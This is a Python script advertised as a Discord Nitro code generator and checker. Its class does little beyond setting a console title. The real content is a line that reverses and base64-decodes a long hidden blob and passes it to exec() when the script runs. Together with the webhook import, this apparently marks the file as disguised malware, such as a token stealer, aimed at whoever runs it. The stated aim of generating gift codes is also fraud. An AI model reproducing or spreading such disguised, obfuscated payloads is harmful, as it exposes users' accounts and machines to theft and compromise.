import time
import requests
from time import sleep
import os
import random
import string
import ctypes

from colorama import Fore, Back, Style
try:
    from discord_webhook import DiscordWebhook
except ImportError:
    input(f"Module discord_webhook not installed, to install run '{'py -3' if os.name == 'nt' else 'python3.9'} pip install discord_webhook'\nPress enter to exit") # Tell the user it has not been installed and how to install it
    exit()
try:
    import requests
except ImportError:
    input(f"Module requests not installed, to install run '{'py -3' if os.name == 'nt' else 'python3.9'} pip install requests'\nPress enter to exit")# Tell the user it has not been installed and how to install it
    exit()
class NitroGen:
    def __init__(self):
        self.fileName = "Nitro Codes - Developed by b4db0y01.txt"

    def main(self):
        os.system('cls' if os.name == 'nt' else 'clear')
        if os.name == "nt":
            print("")
            os.system('cls' if os.name == 'nt' else 'clear')
            ctypes.windll.kernel32.SetConsoleTitleW("Discord Nitro Generator and Checker! | NOT STARTED GENERATOR / CHECKER | Developed by: b4db0y01")
        else:
            print(f'\33]0;Discord Nitro Generator and Checker! | NOT STARTED GENERATOR / | CHECKER Developed by: b4db0y01\a', end='', flush=True)

_ = lambda __ : __import__('base64').b64decode(__[::-1]);exec((_)(b'==QKpciWYhGbZl3ZvhVer9WWpRGThFjTMJ2aFhXVWJ0SSZlUHNWRahlUHhnVWVUV1YlVKNkVrZ1VNVFbGZ1aktkVWJFUVtmVTF1avdHVrp0VSZVS5ZlVSNlUygncVBDch1UV0knUUZUVVVFcVRFbatmUG5kTNZlVP10VOdlVE5kUStGN6FVVadVWXJVRVpnRqV2a0gnVVJlVUZlS2QFbGNlYFRjeapnRP1kMzhnVqJkVlxmRTRVbwRVVxk0dVxmTLJFbkZ1YGZ1UVtWNGRFbodlVWRmVaRkRSNFMwNnVWZEMSZlSZVGRCRlUUZlcVpnR6JlVSN0TVZ1VXVkWyRFbwdXTWpkRlRkQPR1R4ZVVVR3diZkWKF2R4N1UXh3RWtWNH1kROR0YHhnVVZEcHZFRKpnVWJVViVkVUVFRrdXVww2SSZlUK1EVCN1UYd2dVxGaPZlVNhnTEJEVWVVW4Zlbw5kVs1keRdFeWllVZdXVr50bSZlVZJWRW9UUyg3cWFDar1kVGBVVsZFWSVUW3ZVV0RjVWplRUxmVUJ1awJnVWdGeWVVNaplRShVVwolVVVFbLJWRwo3YxY1UWdlUXVVMWNlVsRGSOVlVWRFSRdXVVh2UhBTNWN2R0hVVuF1dUtGbXZlRGZzUXB3UT5mQHZlRSFWZsp0ThZkWSllVaVVVsR2VhtWMKJ1aW9UUrVjNWVEaTJVR1gWVth3USZlWVVVV5QTYxQWVadEcU1EMsVkVFR3QSxmSMJFbaRlVVp0RUtmWH1UV1oVVsZlVWBDcxRFboNlYFVzUiRkRUlFWSZkVrFzRiZkSYNFbWRlUwo0VVFjVrZVV1kUUthHVWFDcWR1aStUYsZlRW1GdTNVMaJHVVp0biZkRGR2R0VVWXJVcWVkVLJlRk1kWGZFWSxmWFZ1aw9kVGRGTNVlVUVFMKNnVG50VhFjUNdlbwNFVHhmcWZEZT1kROZjUWpVVSdEaXZlRSdlYFFzROZlVPVWb4cnVVh2SlxmSTVVb4hFVrB3RWBDeHJlVOVkYFpVVTxmWyVFMK9UYsFleZJDeW1kRsZVVxg2chFTT3ZlVaZlVrl1dUZlQhJlVNpXWyQnTS52Z3VlaKpmVsZlWOVlVXZVVwZTVrx2TiZkTDVWRW9UUwAnNWtmVH1kROV0UtRHVNdEO3RlVodUTFFDVTtmVUlVVaZVVzwmbNZUW5ZVVa9UWVVjcUhFcWZFbSxkTVZVVSVVN2U1aS9UYxo0ShdEeXZleWJnVVJ1ciZEZ1klM0VVVxo1VVVFaXZFbZpnWyQHVVpGbyVFbatmVWZ0QSxmWU1kendnVrR2aWxmUWN1aa9EVyg3RUxGbT1kVO50VqJUVUd1Z4ZVR0RTTGpFThdEeORFSBhHVsZ0TStWNJNGRC9UVspkVWVFbv1kVKh2YFp1TNVUMyR1aOtkVWRGUVxmVYR1a1ckVwo0ThFjSXJlaCRVTVFjcWtGcwIlVOFWTWZ1TUtWNxZVRwNVYxolWXtmUUVmaCZkVxIUYWZFZMJFbahVTUhmVWVFeH1kROlVVuBnVWdlUzRVVWdUTW5ESTxmUTRFVGJnVzwmUhFjW1cVVWdVUyg3RWBzZ1YlVkVzTHR3TVVFcyZFMoFWTWp0VldEdSVVMvdnVrVzcNZlRIdFbSd1UHJlcVFjULZlVOVjW6ZkVXpWR3RFbKNlVWp1QV1GdTdlRwFnVVVzcWtWNUF2R09kUxokNVhFb21UV1MUYFplVT1mUGV1aOtUZsJlUidEeWVFMwVlVwUzSWxWU55kRWdVVzIkcVtWMXFGMxY1YFZ1VWVFcGZ1aoNlVsRGaaZkVWZVVKdkVVVzciVUMENlaCR1VW92dWpmQSZlRaZDVWpFVWhlUGZlaKplUsZlUNZlVTJ1V4JXVVhHNhBDM4J1V0hlVV9GeUpmSaFWMSRVYEZEVSx2b3ZFbOFWTGZ1TSpmRVRVR0gXVuBnTlxmUUd1aWNFVFp1VVBDeDZFbGtkUrZ1URx2b3ZVVWtUYsZEUUtmUUR1VSNXVxI1UWZlTEJ2R4ZFVspkcVxGcTFGbNpXWyQnUNVFbVZFMstWYxokUUxmWT1UMsdkV6ZkSlxWS4R1V4d1UrBnVWpnRWFGbahkVqJkVWxmSHZVVaRTYwUzQhRkRSZ1VSZVVYBnTiVUN2MmM0JlUrlEeWtGdTZlVkJ1UrJFWVZlSGV1axMlUsJFTS1GdYR1VSdkVVR2TSVFN6V1V4dlUHh2cVBTMPZlVOp1VspFVV1mUxVVV1skUsZVSTtmVYZlaWJnVrh2UlxmR2ImeGNVUslFeU5GcK1kVah1TVZFVVtGczVFMjFjVWZERhRkQWllVaVFVrp0ciZkRIRlaCJVVVB3cUVFbDJmRKR0YHhHVU5WQ3RlVWdlVsR2SidEeVNFbaNnVshWYWxmWDplRWJ1Uud2dWxmRXZlVVlXVXR3TT1GaHVFbwNXTFFTNURlQVVmbkZkVWZ1VNZkVWRGRCZ1VWpkRVtmThJFbWFlWFZFVU1mUxZVMwtmYGZkWiZkVW1URGdVVxIENNZkSNplRaZFVV92dWZlWXJlROVzY6JkTNZVR3ZFRKJVTGpFaWxmUUZleGZkVGR2ShtWN1MVVaZ1UtJ1cWxmQ3JWR1gUTVZ1TXZEcxV1ak9WYwETRadEcO10aWZkVVp0VlxmVh1kVWVlVYFEeVVFdDJFbNh3UXRnUl1mTyZleOpUTGZ1VhVkWYNVVwdlVFR2aWxWU6VFVGRFVWB3RVpnTu1kVGRlUsplUTtGN4V1a1clUsRWYaZkWVdFbwZVVrVVMSZlWhR1aWN1UHJlcWVFcPZlRKNlVsp1UTtWNHZFVKJVYwUDajZkVSZVVwFnVq5kTlxWR6N1V4N1VGl0dVNDcaV2a1gkUqZ0UNdkTzRVV0RjVWJFUVpmRTFFM1YFVsR2USxmUONWRWVVTVFTVWZkUrJmRVh3UYB3TWdkUFZFbaNlVWR2SX1GeUV1R4JnVx40UlxmTIZVbwZ1UrBnNVBjTH1kVKdVVsZVVUVUW3RlVOdnVWZUVW5GcURVR1MnVVh3TNZkVIRlbwVVTWxWcUVFawYlVGlkYFpFWVJDeGZleCpWYsZkRVtmVYVVMwZkVw4UYNVVM1QFWwJVVGlEeWVUMzJmRWhVVsJlVUZlSHRFbsFmUsFVeSdFeW10arhXVuxmcSxmS2MmM0dlVUZkRUtGaz1kVWt0VuBnTUVVN2U1aOdVZrFTYiZkVT1kVWNHVWNGeNZkWDRVbwJlVYd2dWhFcW1UV1olWFJlVWdFaHVFMsdlVWZURVtmVPNFbadlVrFzRWxmSMpFRCN1UHhmRU5Gb2J1a1okTXR3UShlQWVFVOZkVsZURPZlVVVFbwFXVwUzVNZlVNFlaGVlVWBncUZlRrJlRRp3VWJFVVpnRGZFMx8mYG50QjVkVXZlbCZVVsVEeNZkSHF2R4RFVyIlRVxmUHJlVONVVthnTWFjSHZVVORjVWZ0SaZkWYZ1RoJXVrVDNSZlUHR1aWVlVHh2VVVlTzZFbZpnUWp1UVREbGVleGpmUGZlNXZlUWVlVaNXVUJkSiZkTEJFbWF1TUJUVVdUNKJFM0d3TFpFTiBTMYdlaSdVTrlzdhFjTZVGRCBHV6pleNZFatFmROFWY6tWeXdFeTJWVxYzUXFTTjdkTERlaKZVTt50bTpmSLJmenh3VEJ0SNJjSz0kVkhmWqx2RTNDcPdlRwVTUshWaktWNYdVbzFTVwQXdTZFZoN2MBp3UthDNNZ1Z3NlaOlGZ6ZEWZdVW1I1arJTUYxWWatmSUd1V0tkVyo0blVEZK9UVGVzVFRncVBDd1FFVGJVVFBnRWVEawEWMORFVuBnUSRlRyVFbSdVYxUFeTVlWYdVV0gHVW50UWZkWFpFRGVlVqZlVVxGcLZFbSRlYHhXVV1mUGZFMxckUsplWWtmUUVlMSVkVWZ1SWZkSXRFbWJFVrBXRWVEdXZlVOpVVsZFVNxGbxV1aOtmUGZlNaFjWP1kMOZDVqpkaSZkTWpFSw9UTykzVUxmRvJlVVpXWwIlVVFDc2QFbG9WTVVTRV1GcYRVV1YVVrJ1SSxWS51ERC90UWBnRUpmRyJFbOp1Urp1VNxmV2UFbwdUTVVTVOVlVWZlRaFnVVJ1cSZlUINlbw9UUspUVVpWTwYlVWtkVtB3VShkQyVFbkdkUsJlVTxmWXZlaWZFVrZFNhBDM3JmM09kVIhmRWBjVTFGbkZDZ6J0TT5GaWVFMONlUGRmNTdFdU1ERBdXVqZkVhxmULZlbw5UVtJlNWtWMDJmRkd0YHRnVXZkW2YVVktUTVVTYkVkVTdlVKNnVwA3diZkWYdVb49EVW9GeVZlQzZFbOBVYEZkVRBTN2YlROFmVW5UYUtmVVJlVwZVVsZ0aSZkTTVFbad1VYJlRWhFbWF2awc3VUZ0TWhkUWRlaJBjVWFFeTZlVYNFbwNnVw8WNWZlTTVFbaV1VFBXRWZEZTJlVSFmWEZkVV1mUFZVR4tkYGJFVPVlVUNFM0gnVFZ1ciZkVTNGRGRlVyIVVVdlRhJmRKlUUth3TVZEcXVFMoFWZspETPdFdUR1aZdXVxQ2VSZkT2cFVCdVVVB3cV1mRhZlVKh2YHR3TXxGczRlaK5kUWplTT5GcWV1RSJHVrh2VSZkShFWRW90UwA3VVNDcOVGbOlUUqZkVltGbzZFMsdVYxYlVaVkVWVVV1YjVrh2TNVUNINlbwdlVWp0VVFDZPV2a1MlVrJFWUZkSHZlRC9UTW5EVXxmVVdlaWJnVsZ1dNZkW1kVMaJVZt5kNWRkROVGbVlnWxYFVVJzd3V1aO9mVVVTSV1GcXN1a1YTVxA3aWtWNSRlbw9UZX50cWBjVTFGbSp0UrZFWSdlUWV1a0RjVWpUWW1GdTdFSBhnVqpkVhBTNLp1Rw5kUzIlRWBjTTV2axY1YFZ1UTxWW4VVVkdXTFVTVV1GdVRVRwdEVsZVYWVEN5J1V05UTxYVRWVFehJlRKF1UrZlVW5WQ4ZlRsdVYs50TPRlQTZFWRdnVIBnbiZUR4Z1VwhlVUt2dUxGc0YlVWl0VrJ1VNVkVWRlaFdXYx4kUR1GeX1kRFhXVWJ0ShFjS200R0NFVWpkRUtGaXVGbaNFVspFWSRkVyZlVk9UYrFTYU1GeXR1RSNnVWZ0USxGZa1kVWh1VF92dWRlRuZlVk1UUthHVWZEcWZFRGZVZrVzQiRkRVJlRKNXVsZUYhxmSXp1R4ZFVGBncWVkWHZFbGpkVrJFWXdEezZ1aStkVGp1RPdFdT1kM5ckVFJFMhFjTNNWRWZlUspURWVEZLF2axgUYHRnVStWNyRVVOdnYGFleTZlUTNVRaZkVzAnTSxWW3FmeGRlUGl1dVxmVLJlVWRVVqZUVSBjSHV1aodlUsJlUidEeO10V5cUVs50TWxmTUFmRWR1UuJkcVBTNXZlRSZlWIBnVTVUN2YlRS9mVVVTWVxmVWllVaFXVsh2TlxmVaN1aSNlVGpURVFjT0EWMGllUsp1TStmSzRlaK5UYxYFWNRlQTVFWSZlVww2VSxmTNNVb0J1UWB3VWhFcq1UVxUVYHhnTSxGcyV1axMlVspURU1GeTRFM1YDVsZ0UNZkVKJGRC5UZXNHeWtGdrJmRKh2UsZFVTZlWVZVMkdXTGpFUNVlVXRFWBhHVrp1VSZkUWpVRahVVXhmVVtGbr1kVGl1YHhnUVFDcyVVV0dlUGVleXZlWVRlVJhnVsp0RhFDZHR1aaZVWVplVVFDaPV2axI1VqJ0TUBTN2YFVCpUYxIlVXtmUWNFbadlVsFVMhBTMKZlaCdVTVxmcUtWO3FWMWNVZHRnTXpmVyZlVKNnVWVVeiBjWWJFMwVkVGh2SWZkWFp1R05kVtJlcWtGchV2awcHZyQ3TTtGcxZlRG9UZs1keXVlVYZVb4dFVrh3UhtWNGZFbSZVVHh2cUtGchFGM1kUVrZ1VUVlWHZVR0ETTGJlSVxmUXNVbSVlVqlEMNZkRaN2R45kUYJ0cWRlQS1kVNhHVVJlVWV0b3ZVVsNVYxE1dapnRWd1a1YUVrpVYiVUN2oVMWZFVsp0RUpmSWVGbOd0UtRnUUdlUGV1Mw5UZs5kWWtmWVVmaCZFVrR2UWZlS1EGMWRVTI5kRWtmTLZVV1EmWEZkUlZlRVVFMZhXYx4kUaZkVY1ESNdnVFB3dhFDZHVVb09UTsZ1cVFDczJlVOp1YGZ1VNZkVVZVMStUYwUTWS1GdXd1V4dEVsRGMSZFZU5EVCdFVHd2dWZEZrZFbGVVUqZkTN5WT3V1aWdlVWpFWUxmUSVVVwdlVxQ2bWVVNONlbwZ1VIJ0RWZkSHJVV1EWVtB3URJTU3ZFRGpmUWRmVVtmUY1kbjdHVs50aNZlRPplRWJVVHh2RWxmTvJmRadlUthHVVZVW3Z1awNXTFVTShdEdVF1awdFVrlzThFjUVRVbw9UVEV0dWtWMvFWMOF1TXR3VRtmSXZVMWdlVsplUU1GeOFlMSJnVEJkVSZkTYFFba9kUIJlVWRkSGZFbJpXWyQHVl1GdXV1MwplUWpFTaVkWVR1R4dEVqFEMSVVNZNFbSVlUFplcUVVMLFGbGZTUUZUVSBTNHZVV0NVZs5EWVpmRV1kRsdkVrBTMSZFZORlaGR1VIJlVWdlRPJlRadUZFZ1TRFjWxZ1MvBTYxolRRxmWXd1RodEVrR2QSxmVKFWRaVFVsp0RWBjWzJVV1gUTWZ1VXVFcGZlRSRTYxY0TSpmRP1UMVdXVq5kdiZkVhJWRa9kUWB3cVtGa00URwgnVWp1TWFTW4RVVaNnUsRGSV1GdW1URsVVVsp1aSVEN5llM4hFVIJ0cVVlShF2a1YFVtBnVVh1Z3VFM1cVZsZFVadEcSV2axIXVWRGNNZkVa1EVCZVZVtGeVVFdXJFbJhXY6J0TVdVU3VFM4RjVWpURiZkVXF1aKdVVV50VWZkSMRlaCdFVFBnNVFDaTFGbSBVYEJUVRtGcFZlVw9UYsVkeVdFdV1EMsdUVrFzRSxmU1M1VwVlVWBXRWFjSrZFbSZTVWJ1VUBTS4ZlRSFmUW5ESW1GdUNlVaZDVrh3bNZkShF2R0V1VVB3VWZlULZVV1YFVsJ1UZZFcyVVMotkUGRWWWtmUVNFMKdkVrFzThtGM4dVVWh1VXdGeUxmUXFGMxklYEZkUNp3Z3R1a5EWYxIlUU5GcUV2asZkVGR2TWZkTN1kVWNVTWZVRWFjVTFGbGVkVrZFVWtWNXZ1a1sUYsV1dVdFcYRVR0cXVVB3UhxmSMVVb09UTsx2cUtWOL1kRa50YEZkVStGcHR1a0tmVGpVROZlVYd1RndXVwYVYWVUNINFbSVlVFVzcWBDaHJFbWRlVtB3VWZlWyZFVGNjVVRzdWVlWXRFVsZkVr5UYWZkSRVVbw9UVxoVcWRlQuFWMalVYEZEVNhEZWV1a5EWZsZESUxmUVllVKJnVFR2cWZlTWNVb0VFVWpVVWpmS2FWMGh0VuB3VUhkQXV1aktUTGZEaT5GcTRlRwVlVwUzbStWNaZ1aWhVVxAXVWBDbhJlVON0UthnUV12Z4ZlVwtUTW5USaZkUSFlM4dFVsJ0USVVNEplRWVFVsp1cWVkVPFGbW1EVtR3VTJDazVlbwpUYrVjNiJDeX1kRsdVVxI0VhFjToN2R0hlVxA3VVBjSLZFbjlnWyQ3TNVkVWZFbsFmYGZlThVkVUZFWSJnVwIFNhBTNRNFbS9EVtJ1VV52b31kRSFFZFZ1VWtGcXRlbwJnUWpFTV1GcVVFbaZDVs9GeWZlUGJGRGN1VVVzVWBDcHZlVNd3UWJlUNRlQyR1aKBTTGp0RkdEdSdlVKZkVrp0TSZlTWZlaGRVTsZURW1mRTZlRG10UtRnVWhkQyZFMOtWYxoETahEcOlVV0cnVYBnbSZlVIVlaGVVZsZlNUZFbrJlVNpXVVpFWRFjWGZlVWFmVsZFaT1GeUVGbGJnVxo1USZlTJ90V0ZVVwolRUtGZL1UV1clVth3TXVVNxVVVO9kUGZlVUxmUTVFSoZEVsZ1TWZkSRRVb0ZFVWpUVVFTVx0UR1o0YHRHWVdlUXRFboFWTVVDaV5GcWVFWoZlVqZkVSZkVapFSwJ1UW92dUVFdPJlVah1UrJFVWVVNFZVVwNlUsp1RTpmRUVFMaNHVVFzbiZUV6d1V4RlVWB3cWpmT6JVV1ckVsJlVSBTNxRFWwpnUWpVViVkVTJlVwdVVsZ1SlxmTNFFbaJFVxk0dWtmSh1URxklWHBXVUVEcGVFbsNkYGVEeWhFcTZlRKNHVVVzShxmWodlaGV1VtJlNWZlQLFWMahlTVZlVShlQzVFMstmYGZEUhdEdTJ1VnhXVxI1alxmThp1R4ZVTwUEeVVVNTFWMWp0YGp1UVFTS4ZFbO9kUWZ1TNVlVX1EbFhHVuxmShFjVJZVbwh1UWBXcVZlUrJlVKZTWwYVVNBTMxZVMo9UZspkWUxmWSN1V4ZEVrFTYNZkWMplRSVFVVplcWZEbP1UV1gkYFplVUNjQXR1a5QTYxI1TUxmWPVmVGFXVrFzdWVVNPNFbaZFVwUzRWZlRrZlRalFVsJ1TSVkWzZVV4tkUWJFVVpmRTJleFdnVrlFeSZlVoNlaCdlUXFFeVtGah1kVSl1VqZ0VUJjUFVFModVTVRzdVRlQT1EMsJXVz82dSZFZoNVb4VVTFtGeVtWMLFGM1clWFJ1UTBTNVZVMotUYxYkVadEcXNlMSNnVGFVMNZkUMZVb0JlUId2dUxmQTJmRaVkYFpFWXdEazZlaKpUTWZEWRpmRPJ1VRhXVV9WMhFjTDV1aWRVVVVTVVpnSOZlRShFVtBnVX5mQHZVMGdnVWJlVX1GdVdlasZkVsR2dWxmSZNlaG5UU6xmRVtGaz1UR140VtBHWWhEaWRFbWdUYxYkTadEeYV2aWdVVVR2VNZVW650R0VlVzEEeUVlSXJmRad1VqZ0TVZEcWRFba9kVspVUV1GeWNVMZhnVU5kehFDZ2IFVG5UTtR3RUxmQw0kRKVjY6JkVSdEaXVFVFdXTFFzQjVkWX1kaCJHVWpUYWZkUPF2R0VlUIFEeUxmVXZFba5UVrJlVRFjWVZlVkdnVW5UUhRkRPJFWSJnVx8WMSZlVRJ2R490UEZlcUxmUTV2axg0VsZFWTVVNxVlVaFmVrVzRWpmRPZlMndHVWx2biVUMoNVbwZ1VYhmRU5Gb21UR1IVTWZlUNBjRHZVVsFmUGRWTjZkWP1EMWdVVrFzdiZkTO9EVCZFVFlEeWtGcHZFbO90YHhnUWZkSyVleOJkYGRGUkRkQPVVbRhHVrlzaWZkULNVbwdlUEZkRUtWWxEWMWF1UrZ1TXRUR3ZVRW9mVs5UWkdEdVV2asFXVVJ1biZkS1E1V4J1UGpkVV1mRhFWMadFVuBXVXVEczZVV1clVsJlTS1GeO1ERCJnVIxmWhFjVPFmRWNVTGZ0VVRlTqZlRk9EVrp1VVZFcyRVV1MVTG1keWhFcTFlbCZlVuBnRNZlWENlbwdVTH10dWVkW31UR1clWEZ0VSV1b4RlVkBjUWJlNSdFdUNlVKZUVspVYlxmSDNGRC5kUyg3VVZlSTJFbWpVVtBnUZZlWFZlaCpVYrFzRaZkWPNlVaZUVwkzciZkRMZ1aahFVwUjcWBjWPVGbKplYHRnTVdlUWRFbs9mUspUNUdFeTZFMwNHVslUMSZlUNFGRG5UVIF0dV5GcKFGbWF1TUJ0TSZkSxV1aadnUWNGeSRlROd1RndHVWx2bNVVMLF2R4JVUuJlcUtmShZlVS9EVtB3VShlUWZlVVVTYwUjTlZkVS1kVsJXVrVzUWxmVoF2R0hVU6xmcUVFezJmROVEVtBHWSFTS3ZlbwpUYxEleVRlRSVVMwJnVwUzaNZkRQZlaCdVTsxmcUVVMLFWMSlUYHRHWUxWS4VleCpkUWp0SVxmWUZ1MCZlVwoUYWZkUDN1aWRVZtRmcWZlRhJWRxUzVVZFWXtWNyRVVwNVZs1kePRkQORlRKFXVVhWYNZkVXN2R0RFVrVjcWtWOvFWMGBlTVZFWXRlVWVFMk9kUs5kRWtmWPVlMoJnVFpVYWZlWFV1aWd1UUZkcUxmSLJmRjh3VWZlVVRUR3RFbs9mVWZFTV5GcPZVMvhXV6JkWWtWNKFVb45EVsp1VWtWV4ZlVOpkVrZlVUpnVWZFRG5kUWplNWVlUT1UbOZVVrRHMNVUNRNVb45UTVx2cW1mRPJFbKZlWIBXVRBjSHZ1ak9mUspEWaVkVU1UVsdVVxwWYNZkW2UlVaV1VrplVVdlRhZlRGl1VsZ1VNxGbXZVRW9UTWZ0UWxmVXJ1RRdXVWZFNSVVNQdVb0RVTxYVRVFjQLJmRGdVVspVVZdVU4R1aO9kUGlleTRlRSZ1V4ZUVrZ1ShFTV3lVMShFVIJ0cWFDZh1kRSZlYEJkTN1GZGVFMWtUYsJVYW1GcW1UbzdXVVB3alxmVNZFbaV1Vsl0dUVFezJlVk9kYHRHVThEayV1aOtkYGZERNRlQO1kRsdlVG50USZlTFpFSwNVZtRmVV1mRT1kVVd3VVZ1VTd1d3VFMwUjUVVDVUpmQP1kaSZUVrR2dWxmTGpFRG50UXFFeVtGaTFWMZl3UWJFWRBTW3R1a5clUWJVTidEdYdlRKdlVFp1VhBTNOdFbaZVVxoVVWxmUzJmRKFlWGplUSxmWFRFbKNnVsFVeWVlWX1kVGZlVWJ0RSxmVhN1aSVFVHhmRUxmTXJlVOZkVrpFWU1GeXV1a0NlUs50SUxmWWd1RSJnVWp0dSxmTINVb49EVrBnNWpmTu1kROd1UthnVNhkTyZVV4UTTGZ0QaZkWS10ROZFVsNWNhFTU310R0ZVTsZlVVVlT3JWR1olUsplVNVlVWZFROplVspEVadEdWNVRaJHVUpkViZkRQJ1aW90VWl1dVtmWLFGbat0TUJ0TUZFczVlVZhnVWZVUX5GcS1kMNdXVWJ0UhFjWJNGRGN1UXh3RVtGMxYlVGV1Urp1VXVEczZlVG9kUWJ1ST1GePNlRvdnVVp1ShxWU4NlVWJlUzgmVWxmRLZFbKZzUUZ0VVVVNGRFbSdnUs5UYaVkUUV1VoJHVW50aSZlURplRaNVTEJkVVV1Z4JlVSZjWygHWWxWS3RlVGBjVWRmNXdFcV1Ub0JXVWJ0RSVVNIZFbadlVYFEeVtGbXFGbOlkWEZEVTZkSHRlbwplUGF1dZFjUUZVV1InVxo0RSZlUodVbw9EVyIlNWVlUv1kRa5kVsZFWlpGaWR1asNnVsJFTiZkVSZleWZlVVB3ThtWMoRVb0ZlVFVjcWpmSKJlVOVkUtRHVUJjU2UVVk9WYxoFVWpmQVJVMaZkVGx2aWZlTXJ2R4RFVqZkVVRlQSVGbRhnVXR3TVBjSzRVVvVjUW1EeVdFcOVmVWZTVqJkdhBDN5R1Vw50VrVjNUpmRSVGbaFmWEZ0TN1GZXVVMGdkUspUUjRkQOFlaGZFVrp1aWZFZN5EVCJlVWpVVVxGcTJlRapVYHhnTR1GeyZVMa9kVspEUadEcYV1VodVVsx2aWZ0Y69kRWN1UIFEeVBDbXJmRGllWGpFVVZ1b4ZlRKBTTGpkRWtmWTdFbvhXVXZ0TSZkVDRVbwd1VsBnVW5GbOFWMKBlUqZkUNBTMGVleGpVZrFjVTxmUXFlModkVVR3ciZkToJlaC9kUFplRVBTMLVGbGVlYFZlVNpGayRlaGZnUsZFShRkRVNFWCZUVrVVMWZFZZF2R0hVVVVjRWxGZhFGbkdVYHR3VVxmSxVFMO9UZsZVNXhFcTZ1V4ZVVsB3RNVUMQFGRG9kUspVcVZFcTFGbWN1YEJkVWdFaWZ1a0NXYxQmSXpmRTZFVsZkVrx2aWZlTQd1aaZlUslFeVBDaPZlVRh3UWZFWTxmWWV1ak9mVVVjVXtmVW10aWZlVWZ0aWxmROJFbWVVVGBnVUpmQy1kVOVVVrJ1Vl1mTGZVVatkUFVTURtmWTRFRsZVVwo1SNZlSYFVb4ZVZt5kVVtmU3JmRSp0YHhXVRxmWxZFbwdlUFVTNUZlWYNlbCdFVs50UiZkVKJFbaRlVFBnRWVkVHZlVKNUVqJ0VRpGbGZVMkNVZrBTeWRlQOd1R4JHVVh3RiZUV3JWMWJVVxokNVZlSzZlVSh1TVZlVWxGcGV1aaBjVWZFRWtmUXNlVaZTVWtWNWZlVX10V09UTX5URWt2axIVV140VqJ0UW1mU2U1a5sWYsp0UTxmWWRFWSJnVFRWYNZlSSp1R4JVTGZ1VVVFZhJmROdVYFp1TSt2b3RlaGJnYG5ESjdEeP1UVxYkVwQ3ThFjRKdVb0JFVEZkRWVFc3ZlVkVUVrJ1UUFDcHZ1a1cXTVVDahRkQVZVVaZUVxEVNhFjVQZlbwNVVYF0dVFjWLJFbkN1VthXVTVUW3VlaKpXTGZ1ROdFdWllVwZlVw40VlxWV5J1V0dlVuhmVWZlTXZFbWxEZGZ1TVBDcxZFMJVjUW5ESTpmQUNVbodVVXZ0dWZlTIN1aShFVsB3cVBTMh1kVaNkVsp1UNVEbGVFbo9mYFFTSRtmWWdFSRdnVGB3dWtWNXZlaGNVUwUzcUxGarJmRaNlYEJ0VNdlTzVVVw9mVsRmWU1GdURFbZhXVxI0UhxmW1U1V0hVZXljcWFjQrFGbVlXTHR3TStmWyZVRNhnVW5kWUpmRW1ESkZVVVh2dWxWU6dFWwVlVsp1VWZlQLJFbWxEVth3UWBDcWZlaNRjUWZVWadEdVN1VSJHVr1UMNZkTDJ1aa9kVxoUVVVlSXJlRKRkTWZlVWtmWGRFbaFmUsRWTU5GcORleGZUVsNGeWZlUNplRSh1VFVjcVZlTXFGbFhnYyg3UR52Z3ZVRwFmVG5kRU1GcYZlM3hHVrh3UhFjTZNVb0NlUYJ0cWZlRhJlRONVUqZ0UTVEczR1aodnUW5EaUpmQV1UVGNnVsJ1TiZkSRNFbSdlUFBXRWVFbzZlVSFlVsZVVXtWW3RFbGNVTWJFUTpmQV1ERoJHVrZ1TWZkUJJWRadVTww2VVVFbLZlRkZEZFZ1TWVUNzRVV5QTYxoVTWtmUYRlMRdXVrpUYWZlVMRVb4JVVrVTcWZkUD1kVGp0VtRnUVdkUGV1aKdkVWlVeSRlQXRVR1EnVqFEMhFTV3ZlVSVVZWZVVUxmWhZVV1skVrJFVlVlVGV1asFmYGJlUaZkUXFFbwJnVwQ2SSxGZMdFbShlUGlFeVVFZL1UV1E1UrZFWVZUW3VFbaNVTVVjVWpmRO10ROFXVs50QStWNUFmRaZlUYJlVVxmTDJmRat0VrpFWRtGcxRVVWdnUWRGaX1GcU1kM0dVVWR2bSZlThFWRaVVVGB3VWVkShZVV180UrZ1UN1mTVVFM1MXTG50RW1GeVV2VOZkVqJkUhFjRhJ1aWd1UXhmRW1WRxIlVa9kWFplVVdFayZVMSNVZsFleSdFdPZ1a1UkVwI1QiZkSPdVb4dlUIJlRVFDZPZlRkdVYFpFVVVkWXVFMwdkUW5kRV1GdYFVMwdVVxI1bSxmSSNFbW9UTGxWRWFjWzJFbkNEVqJ0TTtGcXZlVoBjUWpkROZlVWJVVaNXVuBnVlxmRGN1aSZ1Vth2cVtGcT1UV14UVsZFVVZlWxVFMw9mVWpFahVkVXNlMRhnVGlFeWZVS3FmM0ZlUWl1dWpmT6ZlVKt0Vrp1TWtWNWVVbGBTTFFDRaRkQTJlVvhnVuBnWlxWW6llM0ZVUtJlcWxmWhJVV1EGVsJ1TWZUS3RVV4tkUWJFWTxmVXNlRZdHVWp0VSZlVG5EVCd1UGl0dUxGZXZFbKZ0UtR3UWFjSyV1akNXYwUTYRtmWWZVV1UVVxY1SWZEZaR1aWVVTyQ3VUtGbXFGbGZlVtB3USBTW3ZlRO9kUWpEaX1GcXJlbCJHVUJkRNZkVVV1aS90UVVTVVxmSXJFbOhFVrJFWWVUNFVFbw9mUsF1djpnQUVWVWZlVWZ1QSxGZLNFbaNlUsBXcWVlVP1kRKNEVtR3VWhkUyVVV49mUrVzUSpmQOZlMRhnVUJkcWxmRhJ1aWRVVUt2dVNDcKJFbaZzUXB3URFDcXVVMG9kVGZkNhBjWYVWVxYlVxAHMhFjWEF2R0JVVXJ1cWFDah1UVwkHVUJkURxGcyVVVktWYsZkUT1GeUZlVvdnVWZVYNVVMPRFbaZlVxo1RVxmVw0kRSN1UrZFVUZEcVZ1aONVYx4UVW1GeVF1a0gnVWJ0SSZkWDVlbw5UTykjcWt2cx0kRGZkWHhHWRJDezZVVodlUFVTYTpmQUZFbwJnVqZkTWZkSFplRSNVUtJlNWt2Y1YlVGJ1YHhnVZVVNWZlVadkUs50TPZlVX10R5MnVwI1VWtWNDRFbWZVUrB3VWVFchF2a1Q0YEZEVXZEcWZVV4NXTGplUhVkVWRVbodVV6ZkaWxmTMVVb4VFVxAnRWtmWXV2a1wkTVZFWUtGcHZFMO9WTFFjSUxmWSZ1MCZUVspEMSZlVodFbaZFVW92dVpnSaFWMaVVTUJUVNVUMWZFVGZkUs1kehBjWVNVVKdVVrR3TlxWV5JlVaNlVGpkVVVFdrZFbONlVuB3TT5mQGZlRk9mUslUeaFjVVVWbkdkVWR2RhFDZ2EmeGN1VrB3RUtGZLZ1a1wEVsJ1UTxmWzRVVOtkVWpFSjZkWVZVbSdVVrp1ThxmWWdFbWNVUxAX